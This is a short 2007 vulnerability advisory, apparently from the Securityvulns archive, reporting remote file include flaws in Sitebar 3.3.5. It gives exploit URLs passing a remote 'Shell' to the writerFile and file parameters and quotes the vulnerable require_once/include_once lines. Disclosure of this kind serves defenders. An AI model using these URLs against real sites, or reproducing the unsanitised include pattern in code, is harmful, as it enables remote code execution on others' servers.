Sitebar 3.3.5 (index.php writerFile)Remote File Include Vulnerabilities

2007-04-16T00:00:00
ID SECURITYVULNS:DOC:16724
Type securityvulns
Reporter Securityvulns
Modified 2007-04-16T00:00:00

Description

Sitebar <= 3.3.5 Remote File Include Vulnerabilities

#### ###### ###### ###### ### ##

D.Script:

http://scripts.ringsworld.com/bookmark-management/sitebar-3.3.5.zip

##### ###### ##

-::AUTHOR: VerY-SecReT

## ## #######

Homepage: http://www.sniper-sa.com

##### ###########

Exploit: :-

[target]/sitebar/index.php?writerFile=Shell

[target]/sitebar/Integrator.php?file=Shell

### ######## ###########

$Includer:

(index.php) require_once($writerFile);

(Integrator.php) include_once($file);

##

Thanx to: SnIpEr-Sa & 10x Master Of Hacker & Silent Hell


Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/